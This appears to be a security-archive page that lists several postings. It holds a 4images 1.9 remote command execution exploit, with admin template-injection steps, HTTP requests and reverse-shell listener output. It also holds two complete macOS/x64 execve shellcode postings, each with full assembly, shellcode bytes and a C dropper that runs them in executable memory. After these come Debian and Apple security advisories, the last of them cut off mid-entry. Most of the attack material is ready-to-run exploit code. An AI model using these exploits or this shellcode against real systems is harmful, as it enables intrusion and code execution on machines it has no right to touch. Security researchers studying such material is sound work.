4images version 1.9 suffers from a remote command execution vulnerability.

    # Exploit Title: 4images 1.9 - Remote Command Execution# Exploit Author: Andrey Stoykov# Software Link: https://www.4homepages.de/download-4images# Version: 1.9# Tested on: Ubuntu 20.04To reproduce do the following:1. Login as administrator user2. Browse to "General" -> " Edit Templates" -> "Select Template Pack" -> "default_960px" -> "Load Theme"3. Select Template "categories.html"4. Paste reverse shell code5. Click "Save Changes"6. Browse to "http://host/4images/categories.php?cat_id=1"// HTTP POST request showing reverse shell payloadPOST /4images/admin/templates.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0[...]__csrf=c39b7dea0ff15442681362d2a583c7a9&action=savetemplate&content=[REVERSE_SHELL_CODE]&template_file_name=categories.html&template_folder=default_960px[...]// HTTP redirect response to specific templateGET /4images/categories.php?cat_id=1 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0[...]# nc -kvlp 4444listening on [any] 4444 ...connect to [127.0.0.1] from localhost [127.0.0.1] 43032Linux kali 6.0.0-kali3-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.0.7-1kali1 (2022-11-07) x86_64 GNU/Linux 13:54:28 up  2:18,  2 users,  load average: 0.09, 0.68, 0.56USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHATkali     tty7     :0               11:58    2:18m  2:21   0.48s xfce4-sessionkali     pts/1    -                11:58    1:40  24.60s  0.14s sudo suuid=1(daemon) gid=1(daemon) groups=1(daemon)/bin/sh: 0: can't access tty; job control turned off$

4images 1.9 Remote Command Execution

286 bytes small macOS/x64 execve Caesar cipher string null-free shellcode.

    # Shellcode Title: macOS/x64 - Execve Caesar Cipher String Null-Free Shellcode (286 Bytes)# Shellcode Author: Bobby Cooke (boku) @0xBoku github.com/boku7# Date: 12/20/2022# Tested on: macOS Monterey; 21.6.0 Darwin Kernel Version; x86_64# Shellcode Description:# macOS 64 bit shellcode. Uses execve syscall to spawn bash. The string is ceasar cipher crypted with the increment key of 7 within the shellcode. The shellcode finds the string in memory, copies the string to the stack, deciphers the string, and then changes the string terminator to 0x00.# Shoutout to IBM X-Force Red Adversary Simulation team! Currently working through EXP-312 and tinkering with macOS shellcoding. Shoutout to the offsec team for the cool course! # Compile & run:#     nasm -f macho64 execve.asm -o execve#     for x in $(objdump -d execve --x86-asm-syntax=intel | grep "^ " | cut -f1 | awk -F: '{print $2}'); do echo -n "\x"$x; done; echo#  # Add shellcode to dropper.c#     gcc dropper.c -o dropper#     sh-3.2$ pstree -p $(echo $$) | grep $$#       \-+= 28533 bobby sh#     sh-3.2$ ./dropper #       [+] testcode Length: 286 Bytes#       [+] Copying testcode from variable at 0x10aeeade0 to allocated RWX memory at 0x10b030000#       [+] Executing testcode at 0x10b030000#     bobby$ pstree -p $(echo $$) | grep -B1 $$#       \-+= 28533 bobby sh#         \-+= 28584 bobby (bash)bits 64global _main_main:  create_stackframe:    push rbp           ; push current base pointer to the stack    mov rbp, rsp       ; Set Base Stack Pointer for new Stack-Frame    sub rsp, 0x60      ; create space for string    mov [rbp-0x8], rsp ; Save destination string buffer address    jmp short lilypad_1; char * string eggHunter(egg);;     RAX                 RDIa; description: starts searching for the supplied egg starting from the callers return addresseggHunter:  mov rcx, [rsp]    ; start the egghunter from the caller function return address  hunt:    inc rcx         ; move to the hunter to the next byte    cmp [rcx], di   ; did we find the first  egg?    jne hunt        ; if not, continue hunt    add cx, 0x2     ; move hunter to 2nd egg location    cmp [rcx], di   ; did we find the second egg?    jne hunt        ; if not, continue hunt    add cx, 0x2     ; both eggs found! Move hunter +2 to return the start of buffer addr    xchg rax, rcx   ; return start of string address    ret; int length strsize(&string, terminator);;      RAX              RDI        RSI; description: gets string size of a string that is terminated with a predetermined non-null byte. Terminator byte not included.strsize:  xor rax, rax      ; clear register  xor rcx, rcx      ; set the counter to zero  strsize_loop:    mov rcx, rdi    ; start of string address    add rcx, rax    ; current memory location of char in string    cmp [rcx], sil  ; is this the null terminator?    je strsize_return    prevent_infinite_loop:      cmp ax, 0x1001          ; compare value in RAX to 0x1001 (prevent infinite mem scanning)      jg strsize_fail2find    ; if value in RAX is greater, jump to label    inc rax                   ; move to the next char in the string    jmp strsize_loop  strsize_fail2find:    xor rax, rax    ; return null/ 0x0  strsize_return:    retlilypad_1:  jmp short lilypad_2; char * string terminateString(&string, terminator);;     RAX                          RDI        RSI; description: Finds the string terminator and changes it to a null byteterminateString:  xor rcx, rcx      ; set the counter to zero  mov rcx, rdi      ; start address to look for terminator  loop_find_terminator:    cmp [rcx], sil  ; is this the null terminator?    je found_terminator    inc rcx         ; move to the next char in the string    jmp loop_find_terminator  found_terminator:    mov [rcx], al    ret; void * dst_addr move_memory(void *dst_addr, void *src_addr, size_t mem_size);;        RAX                         RDI             RSI              RDX; description: Move memory from source address to destination address;  ARG1 - RDI: destination address;  ARG2 - RSI: source address;  ARG3 - RDX: size of the memorymove_memory:  ; Loop through memory and move each byte from source to destination  push rdi                 ; save the destination address so we can return it at the end  xor rax, rax             ; register to temporarily hold the byte we are copying  move_memory_loop:    mov al, [rsi]          ; read the byte from source address into the temporary register    mov [rdi], al          ; write the byte at the destination address    inc rsi                ; increment source address    inc rdi                ; increment destination address    dec rdx                ; decrement memory size    jnz move_memory_loop   ; repeat loop until memory size is 0  ; Return to caller  pop rax                  ; return the destination address of the memory to the caller  retlilypad_2:  jmp short lilypad_3; void clear_memory(void *dst_addr, size_t mem_size);;                         RDI              RSI; description: Writes 0x00 bytes to a destination address;  ARG1 - RDI: a pointer to the destination address;  ARG2 - RSI: the size of the memory to be written toclear_memory:  mov rcx, rsi     ; load memory size from second argument into rcx  xor rax, rax  ; Loop through memory and write 0x00 to each byte in destination address  clrmem_loop:    mov byte [rdi], al   ; write 0x00 to byte in destination address    inc rdi              ; increment destination address    dec rcx              ; decrement memory size    jnz clrmem_loop      ; repeat loop until memory size is 0    ret ; Return to caller; void basicCaesar_Decrypt(int stringLength, unsigned char * string, int chiperDecrementKey);;                                  RDI                        RSI                RDXbasicCaesar_Decrypt:  bcd_loop:    sub [rsi], dl  ;  Subtract the value of dl from the memory location pointed to by RSI    inc rsi        ;  Increment RSI to point to the next character    dec rdi        ;  Decrement stringLength counter    test rdi,rdi   ;  Test if stringLength counter is zero    jnz bcd_loop   ;  If stringLength counter is not zero, jump back to the beginning of the loop  ret ; Return to callerlilypad_3:  ; *string = eggHunter(egg); Starts hunt from return address of caller  find_execve_string:     xor rdi, rdi        ; clear register    mov  di, 0xBCB0     ; Arg 1: Our egg    call eggHunter      ; returns string start address    mov [rbp-0x10], rax ; Save string address  get_strlen:    mov rdi, [rbp-0x10]    ; Arg 1: string start address    xor rsi, rsi           ; clear register    mov sil, 0xFF          ; Arg 2: string terminator    call strsize ; returns string size    mov [rbp-0x18], rax    ; Save string size        ; move_memory(dst_addr, src_addr, mem_size);  ;               RDI       RSI       RDX  copy_str2stack:    mov rdi, [rbp-0x8]      ; Arg 1: String buffer on stack    mov rsi, [rbp-0x10]     ; Arg 2: Original string location    mov rdx, [rbp-0x18]     ; Arg 3: size    call move_memory  ; basicCaesar_Decrypt(int stringLength, unsigned char * string, int chiperDecrementKey);  ;                             RDI                        RSI                RDX  do_caesar_cipher_decrypt:    mov rdi, [rbp-0x18]       ; Arg 1: string size    mov rsi, [rbp-0x8]        ; Arg 2: String buffer on stack    xor rdx, rdx              ; clear register    add dl, 0x7               ; Arg 3: Ceaser Chiper Key: 7    call basicCaesar_Decrypt  ; returns string size  do_terminate_string:    mov rdx, [rbp-0x18]     ; string size    mov rdi, [rbp-0x8]      ; String buffer on stack    add rdi, rdx            ; Arg 1: string terminator location    xor rsi, rsi            ; clear register    mov sil, 0x1            ; Arg 2: mem size to null    call clear_memory       ; returns string size  ; execve("/bin/bash",NULL,NULL)  execve:    mov  rdi, [rbp-0x8]  ; Arg 1: String buffer on stack      xor  rsi, rsi        ; Arg 2: NULL    xor  rdx, rdx        ; Arg 3: NULL    xor  rax, rax        ; clear register for syscall number setup    mov  al, 0x2         ; set a bit in register    ror  rax, 0x28       ; move the bit over 28 bits to the right in the register    mov  al, 0x3b        ; set the lower byte (AL) of the RAX register to the execve syscall number    syscall              ; do the syscall interrupt    fixstack:    add rsp, 0x60    ; clear allocated stack space    pop rbp          ; restore stack base pointer    ret              ; return to caller; ~~ Ceaser Chiper String Cryptor ~~; Original String:   /bin/bash; String Length:     9; Ceaser Chiper Key: 7; Chiper String:     6ipu6ihzo; unsigned char chiperString[] = {0x36,0x69,0x70,0x75,0x36,0x69,0x68,0x7a,0x6f};; unsigned char chiperString[] = "\x36\x69\x70\x75\x36\x69\x68\x7a\x6f";; Dechipered String: /bin/bashshell_path_string:  db  0xB0,0xBC,0xB0,0xBC,"6ipu6ihzo",0xFF###########################################################################################################################################// dropper.c#include <stdio.h>#include <sys/mman.h>#include <string.h>#include <stdlib.h>int (*execute_testcode)();const unsigned char testcode[] = "\x55\x48\x89\xe5\x48\x83\xec\x60\x48\x89\x65\xf8\xeb\x3c\x48\x8b\x0c\x24\x48\xff\xc1\x66\x39\x39\x75\xf8\x66\x83\xc1\x02\x66\x39\x39\x75\xef\x66\x83\xc1\x02\x48\x91\xc3\x48\x31\xc0\x48\x31\xc9\x48\x89\xf9\x48\x01\xc1\x40\x38\x31\x74\x0e\x66\x3d\x01\x10\x7f\x05\x48\xff\xc0\xeb\xea\x48\x31\xc0\xc3\xeb\x28\x48\x31\xc9\x48\x89\xf9\x40\x38\x31\x74\x05\x48\xff\xc1\xeb\xf6\x88\x01\xc3\x57\x48\x31\xc0\x8a\x06\x88\x07\x48\xff\xc6\x48\xff\xc7\x48\xff\xca\x75\xf1\x58\xc3\xeb\x1f\x48\x89\xf1\x48\x31\xc0\x88\x07\x48\xff\xc7\x48\xff\xc9\x75\xf6\xc3\x28\x16\x48\xff\xc6\x48\xff\xcf\x48\x85\xff\x75\xf3\xc3\x48\x31\xff\x66\xbf\xb0\xbc\xe8\x6d\xff\xff\xff\x48\x89\x45\xf0\x48\x8b\x7d\xf0\x48\x31\xf6\x40\xb6\xff\xe8\x76\xff\xff\xff\x48\x89\x45\xe8\x48\x8b\x7d\xf8\x48\x8b\x75\xf0\x48\x8b\x55\xe8\xe8\x96\xff\xff\xff\x48\x8b\x7d\xe8\x48\x8b\x75\xf8\x48\x31\xd2\x80\xc2\x07\xe8\xab\xff\xff\xff\x48\x8b\x55\xe8\x48\x8b\x7d\xf8\x48\x01\xd7\x48\x31\xf6\x40\xb6\x01\xe8\x84\xff\xff\xff\x48\x8b\x7d\xf8\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\xb0\x02\x48\xc1\xc8\x28\xb0\x3b\x0f\x05\x48\x83\xc4\x60\x5d\xc3\xb0\xbc\xb0\xbc\x36\x69\x70\x75\x36\x69\x68\x7a\x6f\xff";int main() {    size_t testcode_size = sizeof(testcode);    printf("[+] testcode Length: %lu Bytes\n", testcode_size);      void *rwx_memory = mmap(0, 0x1024, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);     if (rwx_memory == MAP_FAILED) {        printf("[!] Failed to allocate RWX memory\n");        perror("mmap");        exit(-1);    }     printf("[+] Copying testcode from variable at %p to allocated RWX memory at %p\n",testcode,rwx_memory);    memcpy(rwx_memory, testcode, sizeof(testcode));    execute_testcode = rwx_memory;     printf("[+] Executing testcode at %p\n",rwx_memory);    execute_testcode();    return 0;}

macOS/x64 Execve Caesar Cipher String Null-Free Shellcode 

253 bytes small macOS/x64 execve null-free shellcode.

    # Shellcode Title: macOS/x64 - Execve Null-Free Shellcode (253 Bytes)# Shellcode Author: Bobby Cooke (boku) @0xBoku github.com/boku7# Date: 12/20/2022# Tested on: macOS Monterey; 21.6.0 Darwin Kernel Version; x86_64# Shellcode Description:# macOS 64 bit shellcode. Uses execve syscall to spawn bash. The string is within the shellcode. The shellcode finds the string in memory, copies the string to the stack, and then changes the string terminator to 0x00.# Shoutout to IBM X-Force Red Adversary Simulation team! Currently working through EXP-312 and tinkering with macOS shellcoding. Shoutout to the offsec team for the cool course! # Compile & run:#     nasm -f macho64 execve.asm -o execve#     for x in $(objdump -d execve --x86-asm-syntax=intel | grep "^ " | cut -f1 | awk -F: '{print $2}'); do echo -n "\x"$x; done; echo#  # Add shellcode to dropper.c#     gcc dropper.c -o dropper#     sh-3.2$ pstree -p $(echo $$) | grep $$#           \-+= 56862 bobby sh#     sh-3.2$ ./dropper#         [+] Shellcode Length: 253 Bytes#         [+] Copying shellcode from variable at 0x10e4fde00 to allocated RWX memory at 0x10e643000#         [+] Executing shellcode at 0x10e643000#     bobby$ pstree -p $(echo $$) | grep -B1 $$#           \-+= 56862 bobby sh#             \-+= 57021 bobby (bash)bits 64global _main_main:  create_stackframe:    push rbp           ; push current base pointer to the stack    mov rbp, rsp       ; Set Base Stack Pointer for new Stack-Frame    sub rsp, 0x60      ; create space for string    mov [rbp-0x8], rsp ; Save destination string buffer address    jmp short lilypad_1; char * string eggHunter(egg);;     RAX                 RDI; description: starts searching for the supplied egg starting from the callers return addresseggHunter:  mov rcx, [rsp]    ; start the egghunter from the caller function return address  hunt:    inc rcx         ; move to the hunter to the next byte    cmp [rcx], di   ; did we find the first  egg?    jne hunt        ; if not, continue hunt    add cx, 0x2     ; move hunter to 2nd egg location    cmp [rcx], di   ; did we find the second egg?    jne hunt        ; if not, continue hunt    add cx, 0x2     ; both eggs found! Move hunter +2 to return the start of buffer addr    xchg rax, rcx   ; return start of string address    ret; int length strsize(&string, terminator);;      RAX              RDI        RSI; description: gets string size of a string that is terminated with a predetermined non-null byte. Terminator byte not included.strsize:  xor rax, rax      ; clear register  xor rcx, rcx      ; set the counter to zero  strsize_loop:    mov rcx, rdi    ; start of string address    add rcx, rax    ; current memory location of char in string    cmp [rcx], sil  ; is this the null terminator?    je strsize_return    prevent_infinite_loop:      cmp ax, 0x1001          ; compare value in RAX to 0x1001 (prevent infinite mem scanning)      jg strsize_fail2find    ; if value in RAX is greater, jump to label    inc rax                   ; move to the next char in the string    jmp strsize_loop  strsize_fail2find:    xor rax, rax    ; return null/ 0x0  strsize_return:    retlilypad_1:  jmp short lilypad_2; char * string terminateString(&string, terminator);;     RAX                          RDI        RSI; description: Finds the string terminator and changes it to a null byteterminateString:  xor rcx, rcx      ; set the counter to zero  mov rcx, rdi      ; start address to look for terminator  loop_find_terminator:    cmp [rcx], sil  ; is this the null terminator?    je found_terminator    inc rcx         ; move to the next char in the string    jmp loop_find_terminator  found_terminator:    mov [rcx], al    ret; void * dst_addr move_memory(void *dst_addr, void *src_addr, size_t mem_size);;        RAX                         RDI             RSI              RDX; description: Move memory from source address to destination address;  ARG1 - RDI: destination address;  ARG2 - RSI: source address;  ARG3 - RDX: size of the memorymove_memory:  ; Loop through memory and move each byte from source to destination  push rdi                 ; save the destination address so we can return it at the end  xor rax, rax             ; register to temporarily hold the byte we are copying  move_memory_loop:    mov al, [rsi]          ; read the byte from source address into the temporary register    mov [rdi], al          ; write the byte at the destination address    inc rsi                ; increment source address    inc rdi                ; increment destination address    dec rdx                ; decrement memory size    jnz move_memory_loop   ; repeat loop until memory size is 0  ; Return to caller  pop rax                  ; return the destination address of the memory to the caller  retlilypad_2:  jmp short lilypad_3; void clear_memory(void *dst_addr, size_t mem_size);;                         RDI              RSI; description: Writes 0x00 bytes to a destination address;  ARG1 - RDI: a pointer to the destination address;  ARG2 - RSI: the size of the memory to be written toclear_memory:  mov rcx, rsi     ; load memory size from second argument into rcx  xor rax, rax  ; Loop through memory and write 0x00 to each byte in destination address  clrmem_loop:    mov byte [rdi], al   ; write 0x00 to byte in destination address    inc rdi              ; increment destination address    dec rcx              ; decrement memory size    jnz clrmem_loop      ; repeat loop until memory size is 0  ; Return to caller  retlilypad_3:  ; *string = eggHunter(egg); Starts hunt from return address of caller  find_execve_string:     xor rdi, rdi        ; clear register    mov  di, 0xBCB0     ; Arg 1: Our egg    call eggHunter      ; returns string start address    mov [rbp-0x10], rax ; Save string address  get_strlen:    mov rdi, [rbp-0x10]    ; Arg 1: string start address    xor rsi, rsi           ; clear register    mov sil, 0xFF          ; Arg 2: string terminator    call strsize ; returns string size    mov [rbp-0x18], rax    ; Save string size        ; move_memory(dst_addr, src_addr, mem_size);  ;               RDI       RSI       RDX  copy_str2stack:    mov rdi, [rbp-0x8]      ; Arg 1: String buffer on stack    mov rsi, [rbp-0x10]     ; Arg 2: Original string location    mov rdx, [rbp-0x18]     ; Arg 3: size    call move_memory  do_terminate_string:    mov rdx, [rbp-0x18]     ; string size    mov rdi, [rbp-0x8]      ; String buffer on stack    add rdi, rdx            ; Arg 1: string terminator location    xor rsi, rsi            ; clear register    mov sil, 0x1            ; Arg 2: mem size to null    call clear_memory       ; returns string size  ; execve("/bin/bash",NULL,NULL)  execve:    mov rdi, [rbp-0x8]  ; Arg 1: String buffer on stack      xor  rsi, rsi       ; Arg 2: NULL    xor  rdx, rdx       ; Arg 3: NULL    xor  rax, rax       ; clear register for syscall number setup    mov  al, 0x2        ; set a bit in register    ror  rax, 0x28      ; move the bit over 28 bits to the right in the register    mov  al, 0x3b       ; set the lower byte (AL) of the RAX register to the execve syscall number    syscall             ; do syscall interrupt    fixstack:    add rsp, 0x60    ; clear allocated stack space    pop rbp          ; restore stack base pointer    ret              ; return to callershell_path_string:  db  0xB0,0xBC,0xB0,0xBC,"/bin/bash",0xFF###########################################################################################################################################// dropper.c#include <stdio.h>#include <sys/mman.h>#include <string.h>#include <stdlib.h>int (*execute_shellcode)();const unsigned char shellcode[] = "\x55\x48\x89\xe5\x48\x83\xec\x60\x48\x89\x65\xf8\xeb\x3c\x48\x8b\x0c\x24\x48\xff\xc1\x66\x39\x39\x75\xf8\x66\x83\xc1\x02\x66\x39\x39\x75\xef\x66\x83\xc1\x02\x48\x91\xc3\x48\x31\xc0\x48\x31\xc9\x48\x89\xf9\x48\x01\xc1\x40\x38\x31\x74\x0e\x66\x3d\x01\x10\x7f\x05\x48\xff\xc0\xeb\xea\x48\x31\xc0\xc3\xeb\x28\x48\x31\xc9\x48\x89\xf9\x40\x38\x31\x74\x05\x48\xff\xc1\xeb\xf6\x88\x01\xc3\x57\x48\x31\xc0\x8a\x06\x88\x07\x48\xff\xc6\x48\xff\xc7\x48\xff\xca\x75\xf1\x58\xc3\xeb\x11\x48\x89\xf1\x48\x31\xc0\x88\x07\x48\xff\xc7\x48\xff\xc9\x75\xf6\xc3\x48\x31\xff\x66\xbf\xb0\xbc\xe8\x7b\xff\xff\xff\x48\x89\x45\xf0\x48\x8b\x7d\xf0\x48\x31\xf6\x40\xb6\xff\xe8\x84\xff\xff\xff\x48\x89\x45\xe8\x48\x8b\x7d\xf8\x48\x8b\x75\xf0\x48\x8b\x55\xe8\xe8\xa4\xff\xff\xff\x48\x8b\x55\xe8\x48\x8b\x7d\xf8\x48\x01\xd7\x48\x31\xf6\x40\xb6\x01\xe8\xa5\xff\xff\xff\x48\x8b\x7d\xf8\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\xb0\x02\x48\xc1\xc8\x28\xb0\x3b\x0f\x05\x48\x83\xc4\x60\x5d\xc3\xb0\xbc\xb0\xbc\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\xff";int main() {    size_t shellcode_size = sizeof(shellcode);    printf("[+] Shellcode Length: %lu Bytes\n", shellcode_size);      void *rwx_memory = mmap(0, 0x1024, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);     if (rwx_memory == MAP_FAILED) {        printf("[!] Failed to allocate RWX memory\n");        perror("mmap");        exit(-1);    }     printf("[+] Copying shellcode from variable at %p to allocated RWX memory at %p\n",shellcode,rwx_memory);    memcpy(rwx_memory, shellcode, sizeof(shellcode));    execute_shellcode = rwx_memory;     printf("[+] Executing shellcode at %p\n",rwx_memory);    execute_shellcode();    return 0; }

macOS/x64 Execve Null-Free Shellcode

Debian Linux Security Advisory 5305-1 - An integer overflow flaw was discovered in the CRL signature parser in libksba, an X.509 and CMS support library, which could result in denial of service or the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5305-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoDecember 21, 2022                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : libksbaCVE ID         : CVE-2022-47629An integer overflow flaw was discovered in the CRL signature parser inlibksba, an X.509 and CMS support library, which could result in denialof service or the execution of arbitrary code.For the stable distribution (bullseye), this problem has been fixed inversion 1.5.0-3+deb11u2.We recommend that you upgrade your libksba packages.For the detailed security status of libksba please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/libksbaFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmOjfbNfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0TZeA/+NmgALkjZhrkd2BixzJp2eAe5ocLW5B0g9lB93NIyUORM2A3CgX0MsF+UbYrehbBdQosJOMko5E4St7ETC6H4eVknHj+snuP0j0MY/KQspoTTZfE/28y28734oXiBTuaOmEItHWlpuvreTPOzeNaWck/osiSLaBIWCKooGDnpUrTYAV+AQ7l8pyBU7iaZfOV1hR+ndTYdp/JK1Rl0FgPazCe4UQP1EAhMOE8XqVNKZ/MSh2U5JaSPUzTt+sgJWunB9ysBHbSuKFJ1cli7nqFf8urDmKYYU4gZtKFl4AJV0Oe39UTxjOwQkVhz8buLUVwLtXfSxu8jBTQXGLuwQJrr9W1S5mny3wxMgOOqNozdyoFuYNoIFY4+84dTG4H+L0sWbFCWVHY8gCKwPSa6ZK0eP4UQ9dxgmUfK5K6Ldo8gi0iX1v1Ub3OYz7JzeIfkUKTx82yLmFcFisQNgeXe6lMN+Tzu7WTs3w8Y3OA7a65nKb79PDJFZ/Hiw+p06L+C7SkhfcItMbKwqU3IdfsVrGxTK4VbdYZEoMv0+43zBypLDUF+eVC4E3MJSB0k+qAiyLzr6qbaVZp4m04/B2puqnBACIIc3Vm9BUKQCWYx4R6C8rqfxtOfD2Xmz4xGcNZfr342Kig4QNbkc1zatx72maEX1KGt2x9BmqtSvebuw/EwkBQ=9jlL-----END PGP SIGNATURE-----

Debian Security Advisory 5305-1

Apple Security Advisory 2022-12-13-9 - Safari 16.2 addresses bypass, code execution, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-12-13-9 Safari 16.2

Safari 16.2 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213537.

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A use after free issue was addressed with improved  
memory management.  
WebKit Bugzilla: 245521  
CVE-2022-42867: Maddie Stone of Google Project Zero

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A memory consumption issue was addressed with improved  
memory handling.  
WebKit Bugzilla: 245466  
CVE-2022-46691: an anonymous researcher

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing maliciously crafted web content may bypass Same  
Origin Policy  
Description: A logic issue was addressed with improved state  
management.  
WebKit Bugzilla: 246783  
CVE-2022-46692: KirtiKumar Anandrao Ramchandani

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing maliciously crafted web content may result in the  
disclosure of process memory  
Description: The issue was addressed with improved memory handling.  
CVE-2022-42852: hazbinhotel working with Trend Micro Zero Day  
Initiative

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A memory corruption issue was addressed with improved  
input validation.  
WebKit Bugzilla: 246942  
CVE-2022-46696: Samuel Groß of Google V8 Security  
WebKit Bugzilla: 247562  
CVE-2022-46700: Samuel Groß of Google V8 Security

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing maliciously crafted web content may disclose  
sensitive user information  
Description: A logic issue was addressed with improved checks.  
CVE-2022-46698: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs  
& DNSLab, Korea Univ.

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A memory corruption issue was addressed with improved  
state management.  
WebKit Bugzilla: 247420  
CVE-2022-46699: Samuel Groß of Google V8 Security  
WebKit Bugzilla: 244622  
CVE-2022-42863: an anonymous researcher

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution. Apple is aware of a report that this issue  
may have been actively exploited against versions of iOS released  
before iOS 15.1.  
Description: A type confusion issue was addressed with improved state  
handling.  
WebKit Bugzilla: 248266  
CVE-2022-42856: Clément Lecigne of Google's Threat Analysis Group

Additional recognition

WebKit  
We would like to acknowledge an anonymous researcher, scarlet for  
their assistance.

Safari 16.2 may be obtained from the Mac App Store.  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmOZFX0ACgkQ4RjMIDke  
NxniRQ/+LTObFcBEWogS56q3+7wjz2BgzBZYn4gwNGfvXf0zZfmXnTE0WXUolVa1  
8/glHt7Tu5/KKfy6JDqmQvrF6fo2YpBgH0wrux/j4VPVCeaaOa2gXRAw0CBa4e4E  
OabGVEXEsgJjyE4MSMKh8Hn1VD4ANTPPKn5jWmDsCsSS2zEo94gD7Mkqh81CeFoV  
Yhmbv87nZAdEz2nHUkoM6PmN8SPAY5VtRp6i1rbkpcmMfs3VyA/ehnkfBGQK2xH7  
vHpx2yyoXlqwR0zc7uHEge13e8kZ1Zh8UdIecgJuoyOvvmRR5DcchMFUYpUq8JcZ  
JOqN2lsRBu52WvoEGCkD80/PWamhD+CJWeMvgbvEZSOiNKKOSY1qO0w0NsGMPXCh  
6xdcjfeTpslNn4zNUfaAwnUGIyxbIsNNHIgw3VX5GnFihpEsknBqbjxTLCBrDdFE  
T5xuHPBj7vXEW3V2ZXVt2MctWCr0GQdHt66C2m3gAEhL9xoN6YMEXLI0RVgUHmaf  
hOY/EZMIGm1cL33OvMKuvWCJuGW81+2+LJSwoscguhrj7Jb2qTOL2w06VDyNftuY  
F876pPWZgEj1O7DAtL9OP8IdrpSmQnAkvVUIZA6Sx3MaxTdl4f6lG4NlcsMGz+se  
PxxMCYWi8f/sPNxSdfoYardNkQcPsKm13UFu+Q9nSuV0A+x0qgA=  
=F0qN  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-12-13-9

Apple Security Advisory 2022-12-13-8 - watchOS 9.2 addresses bypass, code execution, integer overflow, out of bounds write, spoofing, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-12-13-8 watchOS 9.2

watchOS 9.2 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213536.

Accounts  
Available for: Apple Watch Series 4 and later  
Impact: A user may be able to view sensitive user information  
Description: This issue was addressed with improved data protection.  
CVE-2022-42843: Mickey Jin (@patch1t)

AppleAVD  
Available for: Apple Watch Series 4 and later  
Impact: Parsing a maliciously crafted video file may lead to kernel  
code execution  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-46694: Andrey Labunets and Nikita Tarakanov

AppleMobileFileIntegrity  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to bypass Privacy preferences  
Description: This issue was addressed by enabling hardened runtime.  
CVE-2022-42865: Wojciech Reguła (@_r3ggi) of SecuRing

CoreServices  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to bypass Privacy preferences  
Description: Multiple issues were addressed by removing the  
vulnerable code.  
CVE-2022-42859: Mickey Jin (@patch1t), Csaba Fitzl (@theevilbit) of  
Offensive Security

ImageIO  
Available for: Apple Watch Series 4 and later  
Impact: Processing a maliciously crafted file may lead to arbitrary  
code execution  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-46693: Mickey Jin (@patch1t)

IOHIDFamily  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A race condition was addressed with improved state  
handling.  
CVE-2022-42864: Tommy Muir (@Muirey03)

IOMobileFrameBuffer  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-46690: John Aakerblom (@jaakerblom)

iTunes Store  
Available for: Apple Watch Series 4 and later  
Impact: A remote user may be able to cause unexpected app termination  
or arbitrary code execution  
Description: An issue existed in the parsing of URLs. This issue was  
addressed with improved input validation.  
CVE-2022-42837: an anonymous researcher

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A race condition was addressed with additional  
validation.  
CVE-2022-46689: Ian Beer of Google Project Zero

Kernel  
Available for: Apple Watch Series 4 and later  
